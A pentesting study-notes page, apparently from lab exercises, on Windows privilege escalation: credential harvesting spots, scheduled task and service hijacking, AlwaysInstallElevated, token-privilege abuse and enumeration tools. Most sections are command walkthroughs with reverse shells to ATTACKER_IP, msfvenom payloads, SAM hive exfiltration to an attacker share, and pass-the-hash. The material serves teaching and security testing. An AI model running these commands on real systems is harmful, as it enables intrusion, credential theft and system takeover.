📝
Home
Pentesting
  • 📝Home
  • ⚒️PENTESTING
    • Foundational
      • Gaining Access
      • Session Hijacking
      • Buffer Overflows
        • Finding the Offset
        • Spiking
        • Fuzzing
      • Attack Basics
        • Brute Force Attacks
        • Credential Stuffing and Password Spraying
        • Netcat Shell Stabilization
        • Reverse Shells vs Bind Shells
        • Staged vs Non-Staged Payloads
      • Footprinting
    • Reconnaissance
      • Discovering Email Addresses
      • Hunting Subdomains
    • Scanning and Enumeration
      • Banner Grabbing
      • Enumerating HTTP and HTTPS
      • Enumerating SMB
      • Enumerating SSH
      • NetBIOS Enumeration
      • SNMP Enumeration
      • Sniffing
    • Privilege Escalation
      • 🐧Linux Privilege Escalation
      • 🪟Windows Privilege Escalation
        • Initial Enumeration
    • Defense Evasion
      • Hiding Files and Covering Tracks
      • Network Evasion
    • Attacking Services
      • Attacking Kerberos
      • Attacking VPNs
      • Denial of Service
      • Exploiting FTP
      • Exploiting NFS
      • Exploiting SMTP
      • Exploiting Telnet
    • Attacking Active Directory
      • Initial Attack Vectors
        • Gaining Shell Access
        • LLMNR Poisoning
        • SMB Relay
        • Passback Attacks
        • IPv6 Attacks
      • Post-Compromise Enumeration
        • Bloodhound
        • ldapdomaindump
        • PowerView
        • PlumHound
      • Post-Compromise Attacks
        • GPP Attacks
        • Print Nightmare
        • Token Impersonation using Incognito
        • URL File Attack
        • Pass Attacks
        • Kerberoasting
        • LNK File Attacks
        • Mimikatz
      • Post-Domain Compromise Attacks
        • Dumping the NTDS.dit
        • Golden Ticket Attacks
      • Post Exploitation
    • Toolkit
      • Burp Suite
        • Intruder
      • Hping
        • Crafting TCP and UDP Packets
      • Metasploit
        • Meterpreter
        • Shell Handler
        • Gather Information
        • Gaining Root
    • Web Application Hacking
      • Attack Methodology
      • Attacking Web Applications
      • Authentication Bypass
      • Cross-Site Scripting
      • Cross-Site Request Forgery
      • File Inclusion
      • Server-Side Request Forgery
      • Injection
        • Command Injection
        • LDAP Injection
        • SQL Injection
  • 👽MALWARE ANALYSIS
    • Malware Analysis Primer
    • Malware Types
      • Rootkits
      • Viruses
      • WannaCry
    • Analyzing Malicious Windows Programs
    • Static Analysis
      • Basic Static Techniques
      • Advanced Static Analysis
    • Reverse Engineering
      • Crash Course in x86 Disassembly
      • Recognizing Code in Assembly Language
    • Dynamic Analysis
    • Detecting Malware
      • Evasion Techniques
      • Detecting Mimikatz
      • Hunting Malware
      • Hunting Metasploit
      • Hunting Persistence
  • 🏹THREAT HUNTING
    • Foundational
      • ATT&CK Framework
      • CIA Triad
    • APTs
  • 🐍PROGRAMMING & SCRIPTING
    • Foundational
      • Computer Memory
    • C Programming
    • Assembly Language
      • Assembly File Structure
      • Debugging with gdb
    • Bash
    • Python
      • Foundational
        • Booleans and Operators
        • Comprehensions
        • Conditionals
        • Dictionaries
        • Exceptions and Error Handling
        • Functions
        • Lambdas
        • Lists
        • Loops
        • Modules
        • Numbers
        • Reading and Writing Files
        • Sets
        • Sockets
        • String Formatting
        • Tuples
        • User Input
        • Variables
      • Extending Python
        • Virtual Environments
        • Sys Module
        • Requests
        • pwntools
    • Regular Expressions
    • SQL
  • 🕵️DIGITAL FORENSICS
    • Anti-Forensic Techniques
    • 🪟Windows Security Internals
      • Windows Security Internals
        • Kernel
          • Security Reference Monitor (SRM)
          • Object Manager
            • System Calls
            • NTSTATUS Codes
            • Object Handles
            • Query and Set Information System Calls
          • The I/O Manager & The Process and Thread Manager
          • The Memory Manager
          • The Configuration Manager
  • 💼GRC (CISSP Notes)
    • Security Assessment and Testing
    • Security Governance Principles
    • Security Policies Standards and Procedures
    • Preventing and Responding to Incidents
    • Organizational Roles and Responsibilities
    • Organizational Processes
  • 📦Networking
    • Foundational
      • DHCP
      • DNS Basics
      • HTTP Protocol
      • IPSec
      • IPv6 Fundamentals
    • Wireless Technologies
      • 802.11
      • Bluetooth
      • Wireless Authentication
      • Wireless Encryption
Powered by GitBook
On this page
  • Windows Privilege Escalation
  • Harvesting Passwords from Usual Spots
  • Unattended Windows Installations
  • PowerShell History
  • Saved Windows Credentials
  • IIS Configuration
  • Retrieve Credentials from PuTTY
  • Scheduled Tasks
  • AlwaysInstallElevated
  • Abusing Service Misconfigurations
  • Windows Services
  • Insecure Permissions on Service Executable
  • Unquoted Service Paths
  • Insecure Service Permissions
  • Insecure Service Permissions
  • Abusing Dangerous Privileges
  • Windows Privileges
  • SeBackup / SeRestore
  • SeTakeOwnership
  • SeImpersonate / SeAssignPrimaryToken
  • Abusing vulnerable software
  • Unpatched Software
  • Tools of the Trade
  1. PENTESTING
  2. Privilege Escalation

Windows Privilege Escalation

Windows Privilege Escalation

Harvesting Passwords from Usual Spots

Unattended Windows Installations

  • Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:

    • C:\Unattend.xml

    • C:\Windows\Panther\Unattend.xml

    • C:\Windows\Panther\Unattend\Unattend.xml

    • C:\Windows\system32\sysprep.inf

    • C:\\Windows\system32\sysprep\sysprep.xml

  • As part of these files you might find credentials

Unattended Windows Installations

  • Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:

    • C:\Unattend.xml

    • C:\Windows\Panther\Unattend.xml

    • C:\Windows\Panther\Unattend\Unattend.xml

    • C:\Windows\system32\sysprep.inf

    • C:\\Windows\system32\sysprep\sysprep.xml

  • As part of these files you might find credentials

<Credentials>
 <Username>Administrator</Username>
 <Domain>thm.local</Domain>
 <Password>MyPassword123</Password>
</Credentials>

PowerShell History

  • If a user runs a command that includes a password it can be retrieved by using the following command"

# This will only work from cmd.exe 
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

  • Windows allows the use of other users' credentials. The command below lists saved credentials

cmdkey /list

# If you notice any credentials worth trying, use them with this command 
runas /savecred /user:admin cmd.exe

IIS Configuration

  • IIS config is stored in a file called web.config and can store passwords for databases or authentication mechanisms.

  • File can be found here:

    • C:\inetpub\wwwroot\web.config

    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

  • Quick way to find database strings on the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from PuTTY

  • PuTTY doesn't allow users to store their SSH password, but it will store proxy configurations that include cleartext authentication credentials

  • Command to retrieve stored proxy credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks

  • Look for scheduled tasks that either lost its binary or are using a binary you can modify

# Retrieve detailed information 
schtasks /query /tn vulnask /fo list /v 

# We care about the "Task to Run" and "Run As User" parameters 

# Check file permissions of the Task to Run file 
icacls C:\tasks\schtask.bat

# If nc64.exe available we can use that to spawn a reverse shell 
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

# Start listener on attacker machine
nc -lvp 4444

AlwaysInstallElevated

  • Windows installer files usually run with the privilege level of the user that starts it.

  • These can be configured to run with higher privileges from any user account, this could allow us to generate a malicious MSI file that would run with admin privileges

  • This method requires two registry values to be set. You can query these from the command line using the commands below

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

# You can generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_x.x.x.x LPORT=LOCAL_PORT -f msi -o malicious.msi

# You should also run the Metasploit Handler module. 
# Once you have transferred the file you created, run the installer with this command and get the reverse shell 
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

Windows Services

  • Service Control Manager (SCM) is a process in charge of managing the state of services as needed

# Get service configuration
sc qc 

# Service configurations are stored on the registry under 
HKLM\SYSTEM\CurrentControlSet\Services\

Insecure Permissions on Service Executable

  • If executable associated with a service has weak permissions that allows us to modify or replace it, we can gain privileges of the service's account

# Query the service configuration 
sc qc WindowsScheduler

# check permissions 
icacls BINARY_PATH_NAME

# Generate an exe-service payload using msfvenom and serve it through a python webserver
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
python3 -m http.server

# Pull the payload from victim machine using powershell 
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

# Replace the service executable with our payload
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

Unquoted Service Paths

  • Particular behavior happens when the service is configured to point to an "unquoted" executable. This means the path of the associated executable isn't properly quoted to account for spaces on the command

  • When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute:

  • This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute C:\\MyPrograms\\Disk.exe and take the rest as arguments.

  • Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:

  1. First, search for C:\\MyPrograms\\Disk.exe. If it exists, the service will run this executable.

  2. If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter.exe. If it exists, the service will run this executable.

  3. If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.

# Create payload using msfvenom 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe 

# Move payload and grant permissions 
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

# restart service 
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

Insecure Service Permissions

  • If the service DACL lets you modify the configuration then you can reconfigure the service

  • This will let you point to any executable you need and run it with any account you prefer, including SYSTEM itself

# use accesschk from the sysinternal suite to check for a service DACL
accesschk64.exe -qlc SERVICE_NAME

# if the BUILTIN\\Users group has the SERVICE_ALL_ACCESS permission then any user can reconfigure the service

# Create msfvenom and move it to the victim machine using the same steps as before

# Re-configure the service 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# Restart service 

- If binaries are installed in non-default paths that is world-writable (anything other than C:\\Program Files or C:\\Program Files(x86)) then the vulnerability can be exploited. 
 - For example if it is installed in C:\\MyPrograms (inherits permissions of C:\\ directory which allows any user to create files and folders in it.)
- The process of creating a payload with msfvenom is the same as before

Insecure Service Permissions

  • If the service DACL (not the service's executable DACL) lets you modify the configuration of a service, then you can reconfigure the service

  • This let's you point to any executable and run it with the account you prefer.

# You can check for a service DACL from the CLI using Accesschk
# Accesschk is included in the Sysinternals suite
accesschk64.exe -qlc thmservice

# If the Users groups has SERVICE_ALL_ACCESS permission, that means you can reconfigure the service

# Create msfvenom payload 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe

# start listener in attacker
nc -lvp 4447

# transfer payload using python and wget 

# Grant permissions to Everyone to execute the payload
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

# Change the service's associated executable and account 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# We choose to use LocalSystem account because it is the highest privileged account 

# Trigger payload 
sc stop THMService
sc start THMService

Abusing Dangerous Privileges

Windows Privileges

# Check user privileges 
whoami /priv

SeBackup / SeRestore

  • Allows users to read and write to any file in the system, ignoring any DACL in place

  • Allows certain users to perform backups from a system without needing full admin privileges

  • We can escalate privileges by copying the SAM and SYSTEM registry hives to extract local Admin's password hash

Technique: Copy SAM and SYSTEM registry hives to extract the local Admin's password hash

# Check privileges 
whoami /priv

# Backup SAM and SYSTEM hashes 
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

# Copy files to atacker machine using SMB or other available method
# For SMB, we can use smbserver.py to start a simple SMB server with a network share in a directory on the attacker machine
mkdir share 
# This creates a share named public pointing to the share directory and requires the username and password of the current windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

# Use the copy command in target machine to transfer files to your attack box 
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public

# Use impacket to get password hashes 
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL 

# Use Admin hash to perform a pass-the-Hash attack and gain access to target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP 

# Check you get SYSTEM privileges 
whoami

SeTakeOwnership

  • Allows users to take ownership of any object on the system, including files and registry keys

  • Opens up possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take over the service's executable

# Check privileges 
whoami /priv

# Abuse utilman.exe - a built-in windows app used to provide Ease of Access during the lock screen
# Utilman is run with SYSTEM privileges, we can gain SYSTEM privileges if we replace the original binary for any payload we like. 

# Replace utilman, by taking ownership of it 
takeown /f C:\Windows\System32\Utilman.exe

# Being owner of a file doesn't mean you have privileges over it
# Give your user full permissions over utilman.exe using this command: 
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

# Replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe

# Trigger utilman by locking screen from the start button
# Click on the Ease of Access button, running utilman.exe with SYSTEM privileges. 
# Since we replaced it with cmd.exe we will get a command prompt with SYSTEM privileges

SeImpersonate / SeAssignPrimaryToken

  • Allow a process to impersonate other users and act on their behalf

  • Usually consists of being able to spawn a process or thread under the security context of another user

  • As attackers if we can take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process

  • The LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges

  • Things we need to elevate privileges

  1. To spawn a process so that users can connect and authenticate to it for impersonation to occur

  2. Find a way to force privileged users to connect and authenticate to the spawned malicious process

# Use RogueWinRM exploit to accomplish both conditions
# Assume we already compromised a website running on IIS and we planted a web shell 
# Use the web shell to check for assigned privileges of the compromised account and confirm we have both privileges of interest

# RogueWinRM exploit is possible because whenever a user (even unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges
# Post 5985 is simply a port that exposes a PowerShell console
# Think of it as SSH but using PowerShell 

# If WinRM isn't running on victim server, an attacker can
# start a fake WinRM service on port 5985 and cath the 
# authentication attempt made by the BITS service 
# If the attacker has SeImpersonate privileges, you 
# can execute any command on behalf of the connecting user, 
# which is SYSTEM

# Trigger the RogueWinRM using the web shell 
C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools.nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"

Abusing vulnerable software

Unpatched Software

  • Use the wmic tool to list software installed on the target system and its versions

# Command will dump information it can gather on installed software
wmic product get name,version,vendor

  • Search for existing exploits on installed software online

Tools of the Trade

    • Script developed to enumerate the target system to uncover privilege escalation paths

    • PowerShell script that searches common privilege escalation on the target system

    • To run PrivescCheck on target system, you might need to bypass the execution policy restrictions using Set-ExecutionPolicy Bypass -Scope process -Force

    • Avoids making unnecessary noise that can attract attention because it runs on your attacking machine

    • Before using it, type wes.py --update command to update the database

    • To use the script run systeminfo command on the target system

    • Direct the output to a .txt file you will need to move to your attacking machine

# Run wes.py 
wes.py systeminfo.txt
PreviousLinux Privilege EscalationNextInitial Enumeration

Last updated 1 year ago

A complete list of available privileges on Windows systems is available .

You can find a comprehensive list of exploitable privileges on the Github project.

⚒️
🪟
here
Priv2Admin
exploit-db
packet storm
WinPEAS
PrivescCheck
WES-NG